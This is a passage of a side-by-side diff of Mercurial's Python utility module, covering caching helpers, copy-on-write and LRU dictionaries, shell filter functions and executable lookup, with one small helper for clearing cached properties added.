552 '%b %d %I:%M%p',
553 '%b %d %Y',
553 '%b %d %Y',
554 '%b %d',
554 '%b %d',
555 '%H:%M:%S',
555 '%H:%M:%S',
556 '%I:%M:%S%p',
556 '%I:%M:%S%p',
557 '%H:%M',
557 '%H:%M',
558 '%I:%M%p',
558 '%I:%M%p',
559 )
559 )
560
560
561 extendeddateformats = defaultdateformats + (
561 extendeddateformats = defaultdateformats + (
562 "%Y",
562 "%Y",
563 "%Y-%m",
563 "%Y-%m",
564 "%b",
564 "%b",
565 "%b %Y",
565 "%b %Y",
566 )
566 )
567
567
568 def cachefunc(func):
568 def cachefunc(func):
569 '''cache the result of function calls'''
569 '''cache the result of function calls'''
570 # XXX doesn't handle keywords args
570 # XXX doesn't handle keywords args
571 if func.__code__.co_argcount == 0:
571 if func.__code__.co_argcount == 0:
572 cache = []
572 cache = []
573 def f():
573 def f():
574 if len(cache) == 0:
574 if len(cache) == 0:
575 cache.append(func())
575 cache.append(func())
576 return cache[0]
576 return cache[0]
577 return f
577 return f
578 cache = {}
578 cache = {}
579 if func.__code__.co_argcount == 1:
579 if func.__code__.co_argcount == 1:
580 # we gain a small amount of time because
580 # we gain a small amount of time because
581 # we don't need to pack/unpack the list
581 # we don't need to pack/unpack the list
582 def f(arg):
582 def f(arg):
583 if arg not in cache:
583 if arg not in cache:
584 cache[arg] = func(arg)
584 cache[arg] = func(arg)
585 return cache[arg]
585 return cache[arg]
586 else:
586 else:
587 def f(*args):
587 def f(*args):
588 if args not in cache:
588 if args not in cache:
589 cache[args] = func(*args)
589 cache[args] = func(*args)
590 return cache[args]
590 return cache[args]
591
591
592 return f
592 return f
593
593
594 class cow(object):
594 class cow(object):
595 """helper class to make copy-on-write easier
595 """helper class to make copy-on-write easier
596
596
597 Call preparewrite before doing any writes.
597 Call preparewrite before doing any writes.
598 """
598 """
599
599
600 def preparewrite(self):
600 def preparewrite(self):
601 """call this before writes, return self or a copied new object"""
601 """call this before writes, return self or a copied new object"""
602 if getattr(self, '_copied', 0):
602 if getattr(self, '_copied', 0):
603 self._copied -= 1
603 self._copied -= 1
604 return self.__class__(self)
604 return self.__class__(self)
605 return self
605 return self
606
606
607 def copy(self):
607 def copy(self):
608 """always do a cheap copy"""
608 """always do a cheap copy"""
609 self._copied = getattr(self, '_copied', 0) + 1
609 self._copied = getattr(self, '_copied', 0) + 1
610 return self
610 return self
611
611
612 class sortdict(collections.OrderedDict):
612 class sortdict(collections.OrderedDict):
613 '''a simple sorted dictionary
613 '''a simple sorted dictionary
614
614
615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 >>> d2 = d1.copy()
616 >>> d2 = d1.copy()
617 >>> d2
617 >>> d2
618 sortdict([('a', 0), ('b', 1)])
618 sortdict([('a', 0), ('b', 1)])
619 >>> d2.update([(b'a', 2)])
619 >>> d2.update([(b'a', 2)])
620 >>> list(d2.keys()) # should still be in last-set order
620 >>> list(d2.keys()) # should still be in last-set order
621 ['b', 'a']
621 ['b', 'a']
622 '''
622 '''
623
623
624 def __setitem__(self, key, value):
624 def __setitem__(self, key, value):
625 if key in self:
625 if key in self:
626 del self[key]
626 del self[key]
627 super(sortdict, self).__setitem__(key, value)
627 super(sortdict, self).__setitem__(key, value)
628
628
629 if pycompat.ispypy:
629 if pycompat.ispypy:
630 # __setitem__() isn't called as of PyPy 5.8.0
630 # __setitem__() isn't called as of PyPy 5.8.0
631 def update(self, src):
631 def update(self, src):
632 if isinstance(src, dict):
632 if isinstance(src, dict):
633 src = src.iteritems()
633 src = src.iteritems()
634 for k, v in src:
634 for k, v in src:
635 self[k] = v
635 self[k] = v
636
636
637 class cowdict(cow, dict):
637 class cowdict(cow, dict):
638 """copy-on-write dict
638 """copy-on-write dict
639
639
640 Be sure to call d = d.preparewrite() before writing to d.
640 Be sure to call d = d.preparewrite() before writing to d.
641
641
642 >>> a = cowdict()
642 >>> a = cowdict()
643 >>> a is a.preparewrite()
643 >>> a is a.preparewrite()
644 True
644 True
645 >>> b = a.copy()
645 >>> b = a.copy()
646 >>> b is a
646 >>> b is a
647 True
647 True
648 >>> c = b.copy()
648 >>> c = b.copy()
649 >>> c is a
649 >>> c is a
650 True
650 True
651 >>> a = a.preparewrite()
651 >>> a = a.preparewrite()
652 >>> b is a
652 >>> b is a
653 False
653 False
654 >>> a is a.preparewrite()
654 >>> a is a.preparewrite()
655 True
655 True
656 >>> c = c.preparewrite()
656 >>> c = c.preparewrite()
657 >>> b is c
657 >>> b is c
658 False
658 False
659 >>> b is b.preparewrite()
659 >>> b is b.preparewrite()
660 True
660 True
661 """
661 """
662
662
663 class cowsortdict(cow, sortdict):
663 class cowsortdict(cow, sortdict):
664 """copy-on-write sortdict
664 """copy-on-write sortdict
665
665
666 Be sure to call d = d.preparewrite() before writing to d.
666 Be sure to call d = d.preparewrite() before writing to d.
667 """
667 """
668
668
669 class transactional(object):
669 class transactional(object):
670 """Base class for making a transactional type into a context manager."""
670 """Base class for making a transactional type into a context manager."""
671 __metaclass__ = abc.ABCMeta
671 __metaclass__ = abc.ABCMeta
672
672
673 @abc.abstractmethod
673 @abc.abstractmethod
674 def close(self):
674 def close(self):
675 """Successfully closes the transaction."""
675 """Successfully closes the transaction."""
676
676
677 @abc.abstractmethod
677 @abc.abstractmethod
678 def release(self):
678 def release(self):
679 """Marks the end of the transaction.
679 """Marks the end of the transaction.
680
680
681 If the transaction has not been closed, it will be aborted.
681 If the transaction has not been closed, it will be aborted.
682 """
682 """
683
683
684 def __enter__(self):
684 def __enter__(self):
685 return self
685 return self
686
686
687 def __exit__(self, exc_type, exc_val, exc_tb):
687 def __exit__(self, exc_type, exc_val, exc_tb):
688 try:
688 try:
689 if exc_type is None:
689 if exc_type is None:
690 self.close()
690 self.close()
691 finally:
691 finally:
692 self.release()
692 self.release()
693
693
694 @contextlib.contextmanager
694 @contextlib.contextmanager
695 def acceptintervention(tr=None):
695 def acceptintervention(tr=None):
696 """A context manager that closes the transaction on InterventionRequired
696 """A context manager that closes the transaction on InterventionRequired
697
697
698 If no transaction was provided, this simply runs the body and returns
698 If no transaction was provided, this simply runs the body and returns
699 """
699 """
700 if not tr:
700 if not tr:
701 yield
701 yield
702 return
702 return
703 try:
703 try:
704 yield
704 yield
705 tr.close()
705 tr.close()
706 except error.InterventionRequired:
706 except error.InterventionRequired:
707 tr.close()
707 tr.close()
708 raise
708 raise
709 finally:
709 finally:
710 tr.release()
710 tr.release()
711
711
712 @contextlib.contextmanager
712 @contextlib.contextmanager
713 def nullcontextmanager():
713 def nullcontextmanager():
714 yield
714 yield
715
715
716 class _lrucachenode(object):
716 class _lrucachenode(object):
717 """A node in a doubly linked list.
717 """A node in a doubly linked list.
718
718
719 Holds a reference to nodes on either side as well as a key-value
719 Holds a reference to nodes on either side as well as a key-value
720 pair for the dictionary entry.
720 pair for the dictionary entry.
721 """
721 """
722 __slots__ = (u'next', u'prev', u'key', u'value')
722 __slots__ = (u'next', u'prev', u'key', u'value')
723
723
724 def __init__(self):
724 def __init__(self):
725 self.next = None
725 self.next = None
726 self.prev = None
726 self.prev = None
727
727
728 self.key = _notset
728 self.key = _notset
729 self.value = None
729 self.value = None
730
730
731 def markempty(self):
731 def markempty(self):
732 """Mark the node as emptied."""
732 """Mark the node as emptied."""
733 self.key = _notset
733 self.key = _notset
734
734
735 class lrucachedict(object):
735 class lrucachedict(object):
736 """Dict that caches most recent accesses and sets.
736 """Dict that caches most recent accesses and sets.
737
737
738 The dict consists of an actual backing dict - indexed by original
738 The dict consists of an actual backing dict - indexed by original
739 key - and a doubly linked circular list defining the order of entries in
739 key - and a doubly linked circular list defining the order of entries in
740 the cache.
740 the cache.
741
741
742 The head node is the newest entry in the cache. If the cache is full,
742 The head node is the newest entry in the cache. If the cache is full,
743 we recycle head.prev and make it the new head. Cache accesses result in
743 we recycle head.prev and make it the new head. Cache accesses result in
744 the node being moved to before the existing head and being marked as the
744 the node being moved to before the existing head and being marked as the
745 new head node.
745 new head node.
746 """
746 """
747 def __init__(self, max):
747 def __init__(self, max):
748 self._cache = {}
748 self._cache = {}
749
749
750 self._head = head = _lrucachenode()
750 self._head = head = _lrucachenode()
751 head.prev = head
751 head.prev = head
752 head.next = head
752 head.next = head
753 self._size = 1
753 self._size = 1
754 self._capacity = max
754 self._capacity = max
755
755
756 def __len__(self):
756 def __len__(self):
757 return len(self._cache)
757 return len(self._cache)
758
758
759 def __contains__(self, k):
759 def __contains__(self, k):
760 return k in self._cache
760 return k in self._cache
761
761
762 def __iter__(self):
762 def __iter__(self):
763 # We don't have to iterate in cache order, but why not.
763 # We don't have to iterate in cache order, but why not.
764 n = self._head
764 n = self._head
765 for i in range(len(self._cache)):
765 for i in range(len(self._cache)):
766 yield n.key
766 yield n.key
767 n = n.next
767 n = n.next
768
768
769 def __getitem__(self, k):
769 def __getitem__(self, k):
770 node = self._cache[k]
770 node = self._cache[k]
771 self._movetohead(node)
771 self._movetohead(node)
772 return node.value
772 return node.value
773
773
774 def __setitem__(self, k, v):
774 def __setitem__(self, k, v):
775 node = self._cache.get(k)
775 node = self._cache.get(k)
776 # Replace existing value and mark as newest.
776 # Replace existing value and mark as newest.
777 if node is not None:
777 if node is not None:
778 node.value = v
778 node.value = v
779 self._movetohead(node)
779 self._movetohead(node)
780 return
780 return
781
781
782 if self._size < self._capacity:
782 if self._size < self._capacity:
783 node = self._addcapacity()
783 node = self._addcapacity()
784 else:
784 else:
785 # Grab the last/oldest item.
785 # Grab the last/oldest item.
786 node = self._head.prev
786 node = self._head.prev
787
787
788 # At capacity. Kill the old entry.
788 # At capacity. Kill the old entry.
789 if node.key is not _notset:
789 if node.key is not _notset:
790 del self._cache[node.key]
790 del self._cache[node.key]
791
791
792 node.key = k
792 node.key = k
793 node.value = v
793 node.value = v
794 self._cache[k] = node
794 self._cache[k] = node
795 # And mark it as newest entry. No need to adjust order since it
795 # And mark it as newest entry. No need to adjust order since it
796 # is already self._head.prev.
796 # is already self._head.prev.
797 self._head = node
797 self._head = node
798
798
799 def __delitem__(self, k):
799 def __delitem__(self, k):
800 node = self._cache.pop(k)
800 node = self._cache.pop(k)
801 node.markempty()
801 node.markempty()
802
802
803 # Temporarily mark as newest item before re-adjusting head to make
803 # Temporarily mark as newest item before re-adjusting head to make
804 # this node the oldest item.
804 # this node the oldest item.
805 self._movetohead(node)
805 self._movetohead(node)
806 self._head = node.next
806 self._head = node.next
807
807
808 # Additional dict methods.
808 # Additional dict methods.
809
809
810 def get(self, k, default=None):
810 def get(self, k, default=None):
811 try:
811 try:
812 return self._cache[k].value
812 return self._cache[k].value
813 except KeyError:
813 except KeyError:
814 return default
814 return default
815
815
816 def clear(self):
816 def clear(self):
817 n = self._head
817 n = self._head
818 while n.key is not _notset:
818 while n.key is not _notset:
819 n.markempty()
819 n.markempty()
820 n = n.next
820 n = n.next
821
821
822 self._cache.clear()
822 self._cache.clear()
823
823
824 def copy(self):
824 def copy(self):
825 result = lrucachedict(self._capacity)
825 result = lrucachedict(self._capacity)
826 n = self._head.prev
826 n = self._head.prev
827 # Iterate in oldest-to-newest order, so the copy has the right ordering
827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 for i in range(len(self._cache)):
828 for i in range(len(self._cache)):
829 result[n.key] = n.value
829 result[n.key] = n.value
830 n = n.prev
830 n = n.prev
831 return result
831 return result
832
832
833 def _movetohead(self, node):
833 def _movetohead(self, node):
834 """Mark a node as the newest, making it the new head.
834 """Mark a node as the newest, making it the new head.
835
835
836 When a node is accessed, it becomes the freshest entry in the LRU
836 When a node is accessed, it becomes the freshest entry in the LRU
837 list, which is denoted by self._head.
837 list, which is denoted by self._head.
838
838
839 Visually, let's make ``N`` the new head node (* denotes head):
839 Visually, let's make ``N`` the new head node (* denotes head):
840
840
841 previous/oldest <-> head <-> next/next newest
841 previous/oldest <-> head <-> next/next newest
842
842
843 ----<->--- A* ---<->-----
843 ----<->--- A* ---<->-----
844 | |
844 | |
845 E <-> D <-> N <-> C <-> B
845 E <-> D <-> N <-> C <-> B
846
846
847 To:
847 To:
848
848
849 ----<->--- N* ---<->-----
849 ----<->--- N* ---<->-----
850 | |
850 | |
851 E <-> D <-> C <-> B <-> A
851 E <-> D <-> C <-> B <-> A
852
852
853 This requires the following moves:
853 This requires the following moves:
854
854
855 C.next = D (node.prev.next = node.next)
855 C.next = D (node.prev.next = node.next)
856 D.prev = C (node.next.prev = node.prev)
856 D.prev = C (node.next.prev = node.prev)
857 E.next = N (head.prev.next = node)
857 E.next = N (head.prev.next = node)
858 N.prev = E (node.prev = head.prev)
858 N.prev = E (node.prev = head.prev)
859 N.next = A (node.next = head)
859 N.next = A (node.next = head)
860 A.prev = N (head.prev = node)
860 A.prev = N (head.prev = node)
861 """
861 """
862 head = self._head
862 head = self._head
863 # C.next = D
863 # C.next = D
864 node.prev.next = node.next
864 node.prev.next = node.next
865 # D.prev = C
865 # D.prev = C
866 node.next.prev = node.prev
866 node.next.prev = node.prev
867 # N.prev = E
867 # N.prev = E
868 node.prev = head.prev
868 node.prev = head.prev
869 # N.next = A
869 # N.next = A
870 # It is tempting to do just "head" here, however if node is
870 # It is tempting to do just "head" here, however if node is
871 # adjacent to head, this will do bad things.
871 # adjacent to head, this will do bad things.
872 node.next = head.prev.next
872 node.next = head.prev.next
873 # E.next = N
873 # E.next = N
874 node.next.prev = node
874 node.next.prev = node
875 # A.prev = N
875 # A.prev = N
876 node.prev.next = node
876 node.prev.next = node
877
877
878 self._head = node
878 self._head = node
879
879
880 def _addcapacity(self):
880 def _addcapacity(self):
881 """Add a node to the circular linked list.
881 """Add a node to the circular linked list.
882
882
883 The new node is inserted before the head node.
883 The new node is inserted before the head node.
884 """
884 """
885 head = self._head
885 head = self._head
886 node = _lrucachenode()
886 node = _lrucachenode()
887 head.prev.next = node
887 head.prev.next = node
888 node.prev = head.prev
888 node.prev = head.prev
889 node.next = head
889 node.next = head
890 head.prev = node
890 head.prev = node
891 self._size += 1
891 self._size += 1
892 return node
892 return node
893
893
894 def lrucachefunc(func):
894 def lrucachefunc(func):
895 '''cache most recent results of function calls'''
895 '''cache most recent results of function calls'''
896 cache = {}
896 cache = {}
897 order = collections.deque()
897 order = collections.deque()
898 if func.__code__.co_argcount == 1:
898 if func.__code__.co_argcount == 1:
899 def f(arg):
899 def f(arg):
900 if arg not in cache:
900 if arg not in cache:
901 if len(cache) > 20:
901 if len(cache) > 20:
902 del cache[order.popleft()]
902 del cache[order.popleft()]
903 cache[arg] = func(arg)
903 cache[arg] = func(arg)
904 else:
904 else:
905 order.remove(arg)
905 order.remove(arg)
906 order.append(arg)
906 order.append(arg)
907 return cache[arg]
907 return cache[arg]
908 else:
908 else:
909 def f(*args):
909 def f(*args):
910 if args not in cache:
910 if args not in cache:
911 if len(cache) > 20:
911 if len(cache) > 20:
912 del cache[order.popleft()]
912 del cache[order.popleft()]
913 cache[args] = func(*args)
913 cache[args] = func(*args)
914 else:
914 else:
915 order.remove(args)
915 order.remove(args)
916 order.append(args)
916 order.append(args)
917 return cache[args]
917 return cache[args]
918
918
919 return f
919 return f
920
920
921 class propertycache(object):
921 class propertycache(object):
922 def __init__(self, func):
922 def __init__(self, func):
923 self.func = func
923 self.func = func
924 self.name = func.__name__
924 self.name = func.__name__
925 def __get__(self, obj, type=None):
925 def __get__(self, obj, type=None):
926 result = self.func(obj)
926 result = self.func(obj)
927 self.cachevalue(obj, result)
927 self.cachevalue(obj, result)
928 return result
928 return result
929
929
930 def cachevalue(self, obj, value):
930 def cachevalue(self, obj, value):
931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 obj.__dict__[self.name] = value
932 obj.__dict__[self.name] = value
933
933
934 def clearcachedproperty(obj, prop):
935 '''clear a cached property value, if one has been set'''
936 if prop in obj.__dict__:
937 del obj.__dict__[prop]
938
934 def pipefilter(s, cmd):
939 def pipefilter(s, cmd):
935 '''filter string S through command CMD, returning its output'''
940 '''filter string S through command CMD, returning its output'''
936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
941 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
942 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 pout, perr = p.communicate(s)
943 pout, perr = p.communicate(s)
939 return pout
944 return pout
940
945
941 def tempfilter(s, cmd):
946 def tempfilter(s, cmd):
942 '''filter string S through a pair of temporary files with CMD.
947 '''filter string S through a pair of temporary files with CMD.
943 CMD is used as a template to create the real command to be run,
948 CMD is used as a template to create the real command to be run,
944 with the strings INFILE and OUTFILE replaced by the real names of
949 with the strings INFILE and OUTFILE replaced by the real names of
945 the temporary files generated.'''
950 the temporary files generated.'''
946 inname, outname = None, None
951 inname, outname = None, None
947 try:
952 try:
948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
953 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
954 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 fp.write(s)
955 fp.write(s)
951 fp.close()
956 fp.close()
952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
957 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 os.close(outfd)
958 os.close(outfd)
954 cmd = cmd.replace('INFILE', inname)
959 cmd = cmd.replace('INFILE', inname)
955 cmd = cmd.replace('OUTFILE', outname)
960 cmd = cmd.replace('OUTFILE', outname)
956 code = os.system(cmd)
961 code = os.system(cmd)
957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
962 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 code = 0
963 code = 0
959 if code:
964 if code:
960 raise Abort(_("command '%s' failed: %s") %
965 raise Abort(_("command '%s' failed: %s") %
961 (cmd, explainexit(code)))
966 (cmd, explainexit(code)))
962 return readfile(outname)
967 return readfile(outname)
963 finally:
968 finally:
964 try:
969 try:
965 if inname:
970 if inname:
966 os.unlink(inname)
971 os.unlink(inname)
967 except OSError:
972 except OSError:
968 pass
973 pass
969 try:
974 try:
970 if outname:
975 if outname:
971 os.unlink(outname)
976 os.unlink(outname)
972 except OSError:
977 except OSError:
973 pass
978 pass
974
979
975 filtertable = {
980 filtertable = {
976 'tempfile:': tempfilter,
981 'tempfile:': tempfilter,
977 'pipe:': pipefilter,
982 'pipe:': pipefilter,
978 }
983 }
979
984
980 def filter(s, cmd):
985 def filter(s, cmd):
981 "filter a string through a command that transforms its input to its output"
986 "filter a string through a command that transforms its input to its output"
982 for name, fn in filtertable.iteritems():
987 for name, fn in filtertable.iteritems():
983 if cmd.startswith(name):
988 if cmd.startswith(name):
984 return fn(s, cmd[len(name):].lstrip())
989 return fn(s, cmd[len(name):].lstrip())
985 return pipefilter(s, cmd)
990 return pipefilter(s, cmd)
986
991
987 def binary(s):
992 def binary(s):
988 """return true if a string is binary data"""
993 """return true if a string is binary data"""
989 return bool(s and '\0' in s)
994 return bool(s and '\0' in s)
990
995
991 def increasingchunks(source, min=1024, max=65536):
996 def increasingchunks(source, min=1024, max=65536):
992 '''return no less than min bytes per chunk while data remains,
997 '''return no less than min bytes per chunk while data remains,
993 doubling min after each chunk until it reaches max'''
998 doubling min after each chunk until it reaches max'''
994 def log2(x):
999 def log2(x):
995 if not x:
1000 if not x:
996 return 0
1001 return 0
997 i = 0
1002 i = 0
998 while x:
1003 while x:
999 x >>= 1
1004 x >>= 1
1000 i += 1
1005 i += 1
1001 return i - 1
1006 return i - 1
1002
1007
1003 buf = []
1008 buf = []
1004 blen = 0
1009 blen = 0
1005 for chunk in source:
1010 for chunk in source:
1006 buf.append(chunk)
1011 buf.append(chunk)
1007 blen += len(chunk)
1012 blen += len(chunk)
1008 if blen >= min:
1013 if blen >= min:
1009 if min < max:
1014 if min < max:
1010 min = min << 1
1015 min = min << 1
1011 nmin = 1 << log2(blen)
1016 nmin = 1 << log2(blen)
1012 if nmin > min:
1017 if nmin > min:
1013 min = nmin
1018 min = nmin
1014 if min > max:
1019 if min > max:
1015 min = max
1020 min = max
1016 yield ''.join(buf)
1021 yield ''.join(buf)
1017 blen = 0
1022 blen = 0
1018 buf = []
1023 buf = []
1019 if buf:
1024 if buf:
1020 yield ''.join(buf)
1025 yield ''.join(buf)
1021
1026
1022 Abort = error.Abort
1027 Abort = error.Abort
1023
1028
1024 def always(fn):
1029 def always(fn):
1025 return True
1030 return True
1026
1031
1027 def never(fn):
1032 def never(fn):
1028 return False
1033 return False
1029
1034
1030 def nogc(func):
1035 def nogc(func):
1031 """disable garbage collector
1036 """disable garbage collector
1032
1037
1033 Python's garbage collector triggers a GC each time a certain number of
1038 Python's garbage collector triggers a GC each time a certain number of
1034 container objects (the number being defined by gc.get_threshold()) are
1039 container objects (the number being defined by gc.get_threshold()) are
1035 allocated even when marked not to be tracked by the collector. Tracking has
1040 allocated even when marked not to be tracked by the collector. Tracking has
1036 no effect on when GCs are triggered, only on what objects the GC looks
1041 no effect on when GCs are triggered, only on what objects the GC looks
1037 into. As a workaround, disable GC while building complex (huge)
1042 into. As a workaround, disable GC while building complex (huge)
1038 containers.
1043 containers.
1039
1044
1040 This garbage collector issue have been fixed in 2.7. But it still affect
1045 This garbage collector issue have been fixed in 2.7. But it still affect
1041 CPython's performance.
1046 CPython's performance.
1042 """
1047 """
1043 def wrapper(*args, **kwargs):
1048 def wrapper(*args, **kwargs):
1044 gcenabled = gc.isenabled()
1049 gcenabled = gc.isenabled()
1045 gc.disable()
1050 gc.disable()
1046 try:
1051 try:
1047 return func(*args, **kwargs)
1052 return func(*args, **kwargs)
1048 finally:
1053 finally:
1049 if gcenabled:
1054 if gcenabled:
1050 gc.enable()
1055 gc.enable()
1051 return wrapper
1056 return wrapper
1052
1057
1053 if pycompat.ispypy:
1058 if pycompat.ispypy:
1054 # PyPy runs slower with gc disabled
1059 # PyPy runs slower with gc disabled
1055 nogc = lambda x: x
1060 nogc = lambda x: x
1056
1061
1057 def pathto(root, n1, n2):
1062 def pathto(root, n1, n2):
1058 '''return the relative path from one place to another.
1063 '''return the relative path from one place to another.
1059 root should use os.sep to separate directories
1064 root should use os.sep to separate directories
1060 n1 should use os.sep to separate directories
1065 n1 should use os.sep to separate directories
1061 n2 should use "/" to separate directories
1066 n2 should use "/" to separate directories
1062 returns an os.sep-separated path.
1067 returns an os.sep-separated path.
1063
1068
1064 If n1 is a relative path, it's assumed it's
1069 If n1 is a relative path, it's assumed it's
1065 relative to root.
1070 relative to root.
1066 n2 should always be relative to root.
1071 n2 should always be relative to root.
1067 '''
1072 '''
1068 if not n1:
1073 if not n1:
1069 return localpath(n2)
1074 return localpath(n2)
1070 if os.path.isabs(n1):
1075 if os.path.isabs(n1):
1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1076 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 return os.path.join(root, localpath(n2))
1077 return os.path.join(root, localpath(n2))
1073 n2 = '/'.join((pconvert(root), n2))
1078 n2 = '/'.join((pconvert(root), n2))
1074 a, b = splitpath(n1), n2.split('/')
1079 a, b = splitpath(n1), n2.split('/')
1075 a.reverse()
1080 a.reverse()
1076 b.reverse()
1081 b.reverse()
1077 while a and b and a[-1] == b[-1]:
1082 while a and b and a[-1] == b[-1]:
1078 a.pop()
1083 a.pop()
1079 b.pop()
1084 b.pop()
1080 b.reverse()
1085 b.reverse()
1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1086 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082
1087
1083 def mainfrozen():
1088 def mainfrozen():
1084 """return True if we are a frozen executable.
1089 """return True if we are a frozen executable.
1085
1090
1086 The code supports py2exe (most common, Windows only) and tools/freeze
1091 The code supports py2exe (most common, Windows only) and tools/freeze
1087 (portable, not much used).
1092 (portable, not much used).
1088 """
1093 """
1089 return (safehasattr(sys, "frozen") or # new py2exe
1094 return (safehasattr(sys, "frozen") or # new py2exe
1090 safehasattr(sys, "importers") or # old py2exe
1095 safehasattr(sys, "importers") or # old py2exe
1091 imp.is_frozen(u"__main__")) # tools/freeze
1096 imp.is_frozen(u"__main__")) # tools/freeze
1092
1097
1093 # the location of data files matching the source code
1098 # the location of data files matching the source code
1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1099 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 # executable version (py2exe) doesn't support __file__
1100 # executable version (py2exe) doesn't support __file__
1096 datapath = os.path.dirname(pycompat.sysexecutable)
1101 datapath = os.path.dirname(pycompat.sysexecutable)
1097 else:
1102 else:
1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1103 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099
1104
1100 i18n.setdatapath(datapath)
1105 i18n.setdatapath(datapath)
1101
1106
1102 _hgexecutable = None
1107 _hgexecutable = None
1103
1108
1104 def hgexecutable():
1109 def hgexecutable():
1105 """return location of the 'hg' executable.
1110 """return location of the 'hg' executable.
1106
1111
1107 Defaults to $HG or 'hg' in the search path.
1112 Defaults to $HG or 'hg' in the search path.
1108 """
1113 """
1109 if _hgexecutable is None:
1114 if _hgexecutable is None:
1110 hg = encoding.environ.get('HG')
1115 hg = encoding.environ.get('HG')
1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1116 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 if hg:
1117 if hg:
1113 _sethgexecutable(hg)
1118 _sethgexecutable(hg)
1114 elif mainfrozen():
1119 elif mainfrozen():
1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1120 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 # Env variable set by py2app
1121 # Env variable set by py2app
1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1122 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 else:
1123 else:
1119 _sethgexecutable(pycompat.sysexecutable)
1124 _sethgexecutable(pycompat.sysexecutable)
1120 elif (os.path.basename(
1125 elif (os.path.basename(
1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1126 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1127 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 else:
1128 else:
1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1129 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 _sethgexecutable(exe)
1130 _sethgexecutable(exe)
1126 return _hgexecutable
1131 return _hgexecutable
1127
1132
1128 def _sethgexecutable(path):
1133 def _sethgexecutable(path):
1129 """set location of the 'hg' executable"""
1134 """set location of the 'hg' executable"""
1130 global _hgexecutable
1135 global _hgexecutable
1131 _hgexecutable = path
1136 _hgexecutable = path
1132
1137
1133 def _isstdout(f):
1138 def _isstdout(f):
1134 fileno = getattr(f, 'fileno', None)
1139 fileno = getattr(f, 'fileno', None)
1135 return fileno and fileno() == sys.__stdout__.fileno()
1140 return fileno and fileno() == sys.__stdout__.fileno()
1136
1141
1137 def shellenviron(environ=None):
1142 def shellenviron(environ=None):
1138 """return environ with optional override, useful for shelling out"""
1143 """return environ with optional override, useful for shelling out"""
1139 def py2shell(val):
1144 def py2shell(val):
1140 'convert python object into string that is useful to shell'
1145 'convert python object into string that is useful to shell'
1141 if val is None or val is False:
1146 if val is None or val is False:
1142 return '0'
1147 return '0'
1143 if val is True:
1148 if val is True:
1144 return '1'
1149 return '1'
1145 return str(val)
1150 return str(val)
1146 env = dict(encoding.environ)
1151 env = dict(encoding.environ)
1147 if environ:
1152 if environ:
1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1153 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 env['HG'] = hgexecutable()
1154 env['HG'] = hgexecutable()
1150 return env
1155 return env
1151
1156
1152 def system(cmd, environ=None, cwd=None, out=None):
1157 def system(cmd, environ=None, cwd=None, out=None):
1153 '''enhanced shell command execution.
1158 '''enhanced shell command execution.
1154 run with environment maybe modified, maybe in different dir.
1159 run with environment maybe modified, maybe in different dir.
1155
1160
1156 if out is specified, it is assumed to be a file-like object that has a
1161 if out is specified, it is assumed to be a file-like object that has a
1157 write() method. stdout and stderr will be redirected to out.'''
1162 write() method. stdout and stderr will be redirected to out.'''
1158 try:
1163 try:
1159 stdout.flush()
1164 stdout.flush()
1160 except Exception:
1165 except Exception:
1161 pass
1166 pass
1162 cmd = quotecommand(cmd)
1167 cmd = quotecommand(cmd)
1163 env = shellenviron(environ)
1168 env = shellenviron(environ)
1164 if out is None or _isstdout(out):
1169 if out is None or _isstdout(out):
1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1170 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 env=env, cwd=cwd)
1171 env=env, cwd=cwd)
1167 else:
1172 else:
1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1173 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1174 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 stderr=subprocess.STDOUT)
1175 stderr=subprocess.STDOUT)
1171 for line in iter(proc.stdout.readline, ''):
1176 for line in iter(proc.stdout.readline, ''):
1172 out.write(line)
1177 out.write(line)
1173 proc.wait()
1178 proc.wait()
1174 rc = proc.returncode
1179 rc = proc.returncode
1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1180 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 rc = 0
1181 rc = 0
1177 return rc
1182 return rc
1178
1183
1179 def checksignature(func):
